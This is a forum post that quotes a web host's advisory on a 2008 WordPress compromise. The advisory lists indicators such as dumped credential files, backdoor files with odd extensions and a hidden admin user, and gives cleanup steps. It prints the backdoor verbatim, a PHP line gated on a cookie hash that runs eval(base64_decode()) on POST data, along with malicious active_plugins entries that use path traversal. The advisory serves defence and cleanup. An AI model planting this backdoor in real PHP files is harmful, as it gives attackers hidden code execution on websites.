Wordpress Exploits

[walrus]

They must be on the rise as I just recieved this e-mail from my new host

Quote:

Over the last couple of weeks there has been a widespread WordPress exploit that seems to have infected all versions of WordPress except for the most recent release (2.5.1) and

has started to hit accounts hosted on our servers.
You can read more about the exploit here:

http://wordpress.org/support/topic/168964?replies=30

It has been noted that one exploited install on a server may affect all installs on the same server.
Besides upgrading your install to the most recent release, there are a few other things to look for and the steps required to clean-up the exploit.
Before doing anything please BACKUP your database(s). This can be done in your control panel under the "Database Management" link. The database backup will be placed in the

/BACKUPS directory and accessible via FTP.


1) New files named wp-info.txt which contain database usernames and passwords.

This file will contain user info dumped from your database (emails, usernames, passwords, etc.)
If you do find this file, remove it AND change all of your passwords including your visitors' passwords.
On the few WordPress installs that we have investigated we have not come across this file yet, so this file may or may not exist on an infected install.


2) New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories.

These files will have the same name as an existing file but will have one of the following extensions:

_new.php
_old.php
.php.pngg
.php.jpgg
.php.giff

These files are executable when called from a browser and will display a fake 404 error, but will display server system info when called from a script with the matching hash from

one of the hacked php scripts.
Delete these files if found.


3) Extra code added to the first line of PHP files.

This code is added to the first line of php files and provides access to the backdoor account.
The letters and numbers in the code may vary from the following, but it will have the same format:

?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?

This code will need to be removed from each file.
On the few WordPress installs that we have investigated, this line has only been seen in files with the extensions from step 2.


4) New "WordPress" user in database (hidden in the admin panel user's page).

This user will have no info saved for password and an add date of all zeroes.
You will need to delete this user. You can do this via phpMyAdmin. There is a link to phpMyAdmin in your control panel Database Management page.
Browse the wp_users table and remove the "WordPress" user.


5) WordPress version changed to 2.5

Although you are running an older version of WordPress, your admin panel may say that you are running version 2.5
Entries in your wp_options table > active_plugins record may have entries similar to the following:

i:3;s:54:"../../wp-content/themes/xxxx/404_old.gif";
i:4;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpnyQVsn/sess_1695814591293aea19710bfb3dcfc0b9";

Remove these entries by editing the record with phpMyAdmin.
Browse the wp_options table and edit the active_plugins record.


6) Upgrade your WordPress to the most recent version.

Upgrade immediately.
You can download version 2.5.1 here: http://wordpress.org/latest.zip
Instructions for upgrading your install can be found here: http://codex.wordpress.org/Upgrading_WordPress

Although WordPress suggests/requires some directories to be 777 to function, do NOT set them to 777.
Specifically the /wp-uploads, /wp-themes, and /wp-plugins directories are set to 777 so that you can edit them in the administration panel, but this is an open door for a hacker.
755 is the maximum permissions that should be set on any directory.


If you believe your WordPress install has been exploited, open a ticket (support@atcihosting.com) and we can run a search and removal of the files listed in steps 1 and 2.
You will need to complete the rest of the steps in order to clean your install.


Please contact us with any questions.

So on top of trying to get something going on XXX Blog and Porn Blog Surfer...and having lost the database to LO...I now get to upgrade all of my WP installs, change out plug-ins, and modify templates for the new WP.

Sometimes the gods just like to fuck with you!